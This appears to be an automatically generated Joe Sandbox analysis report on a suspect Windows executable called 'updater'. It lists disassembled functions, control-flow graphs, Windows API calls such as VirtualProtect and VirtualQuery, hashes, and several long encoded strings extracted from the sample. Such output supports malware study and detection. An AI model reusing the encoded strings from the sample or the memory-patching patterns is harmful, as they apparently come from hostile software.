7ff758ee6d0a-7ff758ee6d5d 89->95 90->95 102 7ff758ee805a 90->102 91->88 93 7ff758ee6cc7 91->93 92->86 93->86 97 7ff758ee805f-7ff758ee8085 call 7ff758ee97d0 call 7ff758ee1370 94->97 98 7ff758ee6d99-7ff758ee6da0 94->98 95->94 100 7ff758ee6da6-7ff758ee6e50 97->100 115 7ff758ee808b 97->115 98->100 101 7ff758ee6e57-7ff758ee6e5e 98->101 100->101 104 7ff758ee6e64-7ff758ee6e6b 101->104 105 7ff758ee8090-7ff758ee80d2 call 7ff758ee1370 101->105 102->94 108 7ff758ee6eb4-7ff758ee6ebb 104->108 109 7ff758ee6e6d-7ff758ee6ead 104->109 105->109 116 7ff758ee80d8 105->116 113 7ff758ee6ec1-7ff758ee6ec8 108->113 114 7ff758ee80dd-7ff758ee8117 memcpy call 7ff758ee1370 108->114 109->108 118 7ff758ee6f7f-7ff758ee701d wcslen call 7ff758ee153f call 7ff758ee145e 113->118 119 7ff758ee6ece-7ff758ee6eea 113->119 114->119 126 7ff758ee811d 114->126 115->101 116->108 129 7ff758ee70b3 118->129 130 7ff758ee7023-7ff758ee702a 118->130 122 7ff758ee6ef0-7ff758ee6f1e 119->122 123 7ff758ee6f20-7ff758ee6f4a 122->123 124 7ff758ee6f4c-7ff758ee6f78 122->124 123->122 124->118 126->118 131 7ff758ee70bf-7ff758ee70db 129->131 132 7ff758ee70ba call 7ff758ee145e 129->132 130->129 133 7ff758ee7030-7ff758ee70a9 call 7ff758ee2f70 call 7ff758ee39c0 call 7ff758ee14c7 130->133 132->131 133->129 140 7ff758ee70ab-7ff758ee70ae call 7ff758ee145e 133->140 140->129
                                          APIs
                                          Strings
                                          • JisRZGtzaG50dGdrc3N2eWxkaGJic290K2JiY3lrdGNrcWlkanNobnB0Z2tzc3Z5bGRoYmJzb3RrYmJjAWt0Y2Vu02pqx2GjUcxmJ75SIhEFF0gSEBwIBgoPQgAYBRoMH1ELAUoBHQBQHQlLNzwlWQELDAdMV290OydiYx3tc2PEo3YCanNobnB0Z2uDc1R5Z2ZmYmIhb3RrQmJjeWt0YytgaWRqY2hucHRnK3JzdnlsdGhiYnFvdG1iYmN5a3RjbXFp, xrefs: 00007FF758EE68CD
                                          • Jiv5ZGlzaG50dGdrjIx2edRkaGJic290K2JiY3lrdGNrcWlkanNobnB0Z2tzc3Z5bGRoYmJzb3RrYmJjmWt0Y2Vu02pqx2GjUcxmJ75SIhEFF0gSEBwIBgoPQgAYBRoMH1ELAUoBHQBQHQlLNzwlWQELDAdMfmJ+T2JiY3lrdGNeSweYGyhowQEvZ8QCKHbWHT9pzR8ob9s9/xnMDTB0zD3sFMsaKGjBJukKxAEodtY6+RnNEihv2z3/HswJMHTMPewR, xrefs: 00007FF758EE6BA5
                                          • Jiv5ZGlzaG50dGdrjIx2edRkaGJic290K2JiY3lrdGNrcWlkanNobnB0Z2tzc3Z5bGRoYmJzb3RrYmJjUWp0Y2Vu02pqx2GjUcxmJ75SIhEFF0gSEBwIBgoPQgAYBRoMH1ELAUoBHQBQHQlLNzwlWQELDAdMfmJ+T2JiY3lrdGNWAZI9E2L9ZAll8mEKYuNzXg3+aRJi+n5ZC/Jo0XrhaVkY+G8FYv1kHBoPYQ5i43MACvlpCGL6fgcM8mhpeuFpBx//, xrefs: 00007FF758EE7030
                                          • X&, xrefs: 00007FF758EE703E
                                          • 0, xrefs: 00007FF758EE6FCB
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: wcslen$_wcsnicmp
                                          • String ID: 0$JisRZGtzaG50dGdrc3N2eWxkaGJic290K2JiY3lrdGNrcWlkanNobnB0Z2tzc3Z5bGRoYmJzb3RrYmJjAWt0Y2Vu02pqx2GjUcxmJ75SIhEFF0gSEBwIBgoPQgAYBRoMH1ELAUoBHQBQHQlLNzwlWQELDAdMV290OydiYx3tc2PEo3YCanNobnB0Z2uDc1R5Z2ZmYmIhb3RrQmJjeWt0YytgaWRqY2hucHRnK3JzdnlsdGhiYnFvdG1iYmN5a3RjbXFp$Jiv5ZGlzaG50dGdrjIx2edRkaGJic290K2JiY3lrdGNrcWlkanNobnB0Z2tzc3Z5bGRoYmJzb3RrYmJjUWp0Y2Vu02pqx2GjUcxmJ75SIhEFF0gSEBwIBgoPQgAYBRoMH1ELAUoBHQBQHQlLNzwlWQELDAdMfmJ+T2JiY3lrdGNWAZI9E2L9ZAll8mEKYuNzXg3+aRJi+n5ZC/Jo0XrhaVkY+G8FYv1kHBoPYQ5i43MACvlpCGL6fgcM8mhpeuFpBx//$Jiv5ZGlzaG50dGdrjIx2edRkaGJic290K2JiY3lrdGNrcWlkanNobnB0Z2tzc3Z5bGRoYmJzb3RrYmJjmWt0Y2Vu02pqx2GjUcxmJ75SIhEFF0gSEBwIBgoPQgAYBRoMH1ELAUoBHQBQHQlLNzwlWQELDAdMfmJ+T2JiY3lrdGNeSweYGyhowQEvZ8QCKHbWHT9pzR8ob9s9/xnMDTB0zD3sFMsaKGjBJukKxAEodtY6+RnNEihv2z3/HswJMHTMPewR$X&
                                          • API String ID: 4256727079-2301014438
                                          • Opcode ID: 2ad9b95b428851b68ec7e9912ffa00502d73405e26e9a561cf93f4fe1461c13d
                                          • Instruction ID: 877d4e83e87e088788ec62e639415cb135be92b4cb198a829430663728ad666a
                                          • Opcode Fuzzy Hash: 2ad9b95b428851b68ec7e9912ffa00502d73405e26e9a561cf93f4fe1461c13d
                                          • Instruction Fuzzy Hash: 6E426422D1C6E285FB21BF29E9412F4E374AF95384FCC423AD98D56AA1EF7C6145C324
                                          Function 00007FF758EE11D8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
                                          • String ID: &
                                          • API String ID: 3825114775-1499360005
                                          • Opcode ID: fb30249d2068266854ec9e895c86aedb2bf09c1cf0466ecf682e59239ecf8f1d
                                          • Instruction ID: b2dc16cbcfa259594cb04a83b34aa5d8f342aa7cb4a924a5a866e7fb0dfd88da
                                          • Opcode Fuzzy Hash: fb30249d2068266854ec9e895c86aedb2bf09c1cf0466ecf682e59239ecf8f1d
                                          • Instruction Fuzzy Hash: CC414C65E09AA282FA01BF15E850379E7B1AF44781FD8403ACA4D477A1DF3CE481C328
                                          Function 00007FF758EE3350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: memset$wcscatwcscpywcslen
                                          • String ID: $0$0$@$@
                                          • API String ID: 4263182637-1413854666
                                          • Opcode ID: f0c1ed3e0b43149840575df363cb09832e7bcaaaea9c741d1618f9adab6ccee0
                                          • Instruction ID: d9274252410324ab59280d55f8fe4599b29f4ccb110c37a9353a1a125fb00035
                                          • Opcode Fuzzy Hash: f0c1ed3e0b43149840575df363cb09832e7bcaaaea9c741d1618f9adab6ccee0
                                          • Instruction Fuzzy Hash: B0B1B22190C6E286F721AF15F4453BAF7B0FF80344F98413AEA8846A95DF7CE586CB54
                                          Function 00007FF758EE2690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                          • String ID: 0$X$`
                                          • API String ID: 329590056-2527496196
                                          • Opcode ID: bf7d6d7f09f5688ba25f00927fe5a74f17b49469571986f60aaf0f4e4d97f406
                                          • Instruction ID: d199a021da1e44111138413e632118e7c98eb981af62fc9f8c06add61949d431
                                          • Opcode Fuzzy Hash: bf7d6d7f09f5688ba25f00927fe5a74f17b49469571986f60aaf0f4e4d97f406
                                          • Instruction Fuzzy Hash: 03029122918BD182EB20AF15E8443AAF7B0FB85794F99423ADA9C07BE5DF7CD144C714
                                          Function 00007FF758EE1BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • VirtualQuery.KERNEL32(?,?,?,?,00007FF758EEB914,00007FF758EEB914,?,?,00007FF758EE0000,?,00007FF758EE1991), ref: 00007FF758EE1C63
                                          • VirtualProtect.KERNEL32(?,?,?,?,00007FF758EEB914,00007FF758EEB914,?,?,00007FF758EE0000,?,00007FF758EE1991), ref: 00007FF758EE1CC7
                                          • memcpy.MSVCRT ref: 00007FF758EE1CE0
                                          • GetLastError.KERNEL32(?,?,?,?,00007FF758EEB914,00007FF758EEB914,?,?,00007FF758EE0000,?,00007FF758EE1991), ref: 00007FF758EE1D23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                          • API String ID: 2595394609-2123141913
                                          • Opcode ID: 2987fb7c94cd36b2a58051b304da944e2302a15d1c826c7cf92839f9f5faa279
                                          • Instruction ID: c945a178fe8c2aa302e78e176daf73e39fdbc123c0e2adcd718df311bd877e51
                                          • Opcode Fuzzy Hash: 2987fb7c94cd36b2a58051b304da944e2302a15d1c826c7cf92839f9f5faa279
                                          • Instruction Fuzzy Hash: D7419361A085A692EE14BF51D8406B8E7B0EF44B85F98443BCD0D8B791DF3CE585C328
                                          Function 00007FF758EE2104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                          • String ID:
                                          • API String ID: 3326252324-0
                                          • Opcode ID: fd209cddb1df165fe120bb66cf544e8d6e83d75e697be01662b719c901dee52c
                                          • Instruction ID: c1d9bf2b8497792f0b238c8a41aa57cd5b6328fb999b63d5b68048d02f2a7b6c
                                          • Opcode Fuzzy Hash: fd209cddb1df165fe120bb66cf544e8d6e83d75e697be01662b719c901dee52c
                                          • Instruction Fuzzy Hash: AD21C320E0DA6283FA19BF01E950274E370BF44B90FDD043AD91E57AA4DF7DA9468328
                                          Function 00007FF758EE1E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 307 7ff758ee1e10-7ff758ee1e2d 308 7ff758ee1e2f-7ff758ee1e38 307->308 309 7ff758ee1e3e-7ff758ee1e48 307->309 308->309 310 7ff758ee1f60-7ff758ee1f69 308->310 311 7ff758ee1ea3-7ff758ee1ea8 309->311 312 7ff758ee1e4a-7ff758ee1e53 309->312 311->310 315 7ff758ee1eae-7ff758ee1eb3 311->315 313 7ff758ee1e55-7ff758ee1e60 312->313 314 7ff758ee1ecc-7ff758ee1ed1 312->314 313->311 318 7ff758ee1f23-7ff758ee1f2d 314->318 319 7ff758ee1ed3-7ff758ee1ee2 signal 314->319 316 7ff758ee1eb5-7ff758ee1eba 315->316 317 7ff758ee1efb-7ff758ee1f0a call 7ff758ee9f80 315->317 316->310 322 7ff758ee1ec0 316->322 317->318 328 7ff758ee1f0c-7ff758ee1f10 317->328 320 7ff758ee1f43-7ff758ee1f45 318->320 321 7ff758ee1f2f-7ff758ee1f3f 318->321 319->318 323 7ff758ee1ee4-7ff758ee1ee8 319->323 320->310 321->320 322->318 326 7ff758ee1f4e-7ff758ee1f53 323->326 327 7ff758ee1eea-7ff758ee1ef9 signal 323->327 329 7ff758ee1f5a 326->329 327->310 330 7ff758ee1f55 328->330 331 7ff758ee1f12-7ff758ee1f21 signal 328->331 329->310 330->329 331->310
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CCG
                                          • API String ID: 0-1584390748
                                          • Opcode ID: a19b5ea743c64a015226f88ea68dd99b9d0cf90ba8dc366ff5ce5a6acfb792c5
                                          • Instruction ID: 5e0582e3e2916f0baf6182931e0144dca8f16c3dad8855c8324520a29b46cb81
                                          • Opcode Fuzzy Hash: a19b5ea743c64a015226f88ea68dd99b9d0cf90ba8dc366ff5ce5a6acfb792c5
                                          • Instruction Fuzzy Hash: 76219F22E0C12643FA747614AD80379D1A19F847A6FAC853BD91D4B3D8CE3CA8C1C2A9
                                          Function 00007FF758EE38F0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: wcslen
                                          • String ID: 0$@
                                          • API String ID: 4088430540-1545510068
                                          • Opcode ID: bba2083c9aafad6c564e99380eb9ae7bf51f5fbee20126f4752a7ce338e2db8c
                                          • Instruction ID: 996f8c85c13a88d8588ec0e51640fce71698ba1c85ad7f17ac711d5946b329ae
                                          • Opcode Fuzzy Hash: bba2083c9aafad6c564e99380eb9ae7bf51f5fbee20126f4752a7ce338e2db8c
                                          • Instruction Fuzzy Hash: C5118C2252868082E310AB14F44579AF3B4FFD43A4F540129F68C83B68EF3DC18ACB40
                                          Function 00007FF758EE1880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 340 7ff758ee1880-7ff758ee189c 341 7ff758ee1a0f-7ff758ee1a1f 340->341 342 7ff758ee18a2-7ff758ee18f9 call 7ff758ee2420 call 7ff758ee2660 340->342 342->341 347 7ff758ee18ff-7ff758ee1910 342->347 348 7ff758ee1912-7ff758ee191c 347->348 349 7ff758ee193e-7ff758ee1941 347->349 350 7ff758ee191e-7ff758ee1929 348->350 351 7ff758ee194d-7ff758ee1954 348->351 349->351 352 7ff758ee1943-7ff758ee1947 349->352 350->351 353 7ff758ee192b-7ff758ee193a 350->353 355 7ff758ee1956-7ff758ee1961 351->355 356 7ff758ee199e-7ff758ee19a6 351->356 352->351 354 7ff758ee1a20-7ff758ee1a26 352->354 353->349 357 7ff758ee1a2c-7ff758ee1a37 354->357 358 7ff758ee1b87-7ff758ee1b98 call 7ff758ee1d40 354->358 359 7ff758ee1970-7ff758ee199c call 7ff758ee1ba0 355->359 356->341 360 7ff758ee19a8-7ff758ee19c1 356->360 357->356 363 7ff758ee1a3d-7ff758ee1a5f 357->363 359->356 361 7ff758ee19df-7ff758ee19e7 360->361 365 7ff758ee19d0-7ff758ee19dd 361->365 366 7ff758ee19e9-7ff758ee1a0d VirtualProtect 361->366 368 7ff758ee1a7d-7ff758ee1a97 363->368 365->341 365->361 366->365 370 7ff758ee1b74-7ff758ee1b82 call 7ff758ee1d40 368->370 371 7ff758ee1a9d-7ff758ee1afa 368->371 370->358 376 7ff758ee1b22-7ff758ee1b26 371->376 377 7ff758ee1afc-7ff758ee1b0e 371->377 380 7ff758ee1a70-7ff758ee1a77 376->380 381 7ff758ee1b2c-7ff758ee1b30 376->381 378 7ff758ee1b10-7ff758ee1b20 377->378 379 7ff758ee1b5c-7ff758ee1b6f call 7ff758ee1d40 377->379 378->376 378->379 379->370 380->356 380->368 381->380 382 7ff758ee1b36-7ff758ee1b53 call 7ff758ee1ba0 381->382 386 7ff758ee1b57 382->386 386->386
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF758EE1247), ref: 00007FF758EE19F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                          • API String ID: 544645111-395989641
                                          • Opcode ID: a96b84c6a29362a5831d93957ea7165e458f8b3424253329cfa7517644b3fa32
                                          • Instruction ID: 5ec345b4b9abb59d16aa04ddd34e5d6fe98237a8ff336e1d178319f400943754
                                          • Opcode Fuzzy Hash: a96b84c6a29362a5831d93957ea7165e458f8b3424253329cfa7517644b3fa32
                                          • Instruction Fuzzy Hash: 8C515C21F085A6C7EB10BF21E8417B8E771AB14B99F98413AD91C0B794DF3DE886C724
                                          Function 00007FF758EE1800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 387 7ff758ee1800-7ff758ee1810 388 7ff758ee1824 387->388 389 7ff758ee1812-7ff758ee1822 387->389 390 7ff758ee182b-7ff758ee1867 call 7ff758ee2290 fprintf 388->390 389->390
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: fprintf
                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                          • API String ID: 383729395-3474627141
                                          • Opcode ID: 6dbf5a7c010a93ffdc521eff69b8f13d2c87c304966384c1bf5507061ee5eef1
                                          • Instruction ID: c4613551c5bcd269263ff8e4bf869d4b65bbc5a232ea839450ddc42d1bbf1bea
                                          • Opcode Fuzzy Hash: 6dbf5a7c010a93ffdc521eff69b8f13d2c87c304966384c1bf5507061ee5eef1
                                          • Instruction Fuzzy Hash: 55F0C211E18AA583E610BB24A9410B9E370EB593C1F88923AEE4D57251EF3CF182C314
                                          Function 00007FF758EE219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                          • String ID:
                                          • API String ID: 682475483-0
                                          • Opcode ID: 2528049f67c3bbc59b914fdf468fc705937388fb34f79aa992765da7661b039a
                                          • Instruction ID: 886dd62bff442fe0cdeb424fa64847b480e36355587d097ef9a4e468900cd73b
                                          • Opcode Fuzzy Hash: 2528049f67c3bbc59b914fdf468fc705937388fb34f79aa992765da7661b039a
                                          • Instruction Fuzzy Hash: 2D010825E0D66293FA06BF51ED00234D370BB44B90FDD043ADA0D53AA4DF3DA996C324

                                          Execution Graph

                                          Execution Coverage:2.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:828
                                          Total number of Limit Nodes:2
                                          execution_graph 2825 140001ac3 2830 140001a70 2825->2830 2826 140001b36 2829 140001ba0 4 API calls 2826->2829 2827 14000199e 2828 140001a0f 2827->2828 2832 1400019e9 VirtualProtect 2827->2832 2831 140001b53 2829->2831 2830->2826 2830->2827 2830->2831 2832->2827 1995 140001ae4 1997 140001a70 1995->1997 1996 140001b36 2003 140001ba0 1996->2003 1997->1996 1998 14000199e 1997->1998 2001 140001b53 1997->2001 1999 140001a0f 1998->1999 2002 1400019e9 VirtualProtect 1998->2002 2002->1998 2005 140001bc2 2003->2005 2004 140001c04 memcpy 2004->2001 2005->2004 2007 140001c45 VirtualQuery 2005->2007 2008 140001cf4 2005->2008 2007->2008 2012 140001c72 2007->2012 2009 140001d23 GetLastError 2008->2009 2010 140001d37 2009->2010 2011 140001ca4 VirtualProtect 2011->2004 2011->2009 2012->2004 2012->2011 2031 140001404 2104 140001394 2031->2104 2033 140001413 2034 140001394 2 API calls 2033->2034 2035 140001422 2034->2035 2036 140001394 2 API calls 2035->2036 2037 140001431 2036->2037 2038 140001394 2 API calls 2037->2038 2039 140001440 2038->2039 2040 140001394 2 API calls 2039->2040 2041 14000144f 2040->2041 2042 140001394 2 API calls 2041->2042 2043 14000145e 2042->2043 2044 140001394 2 API calls 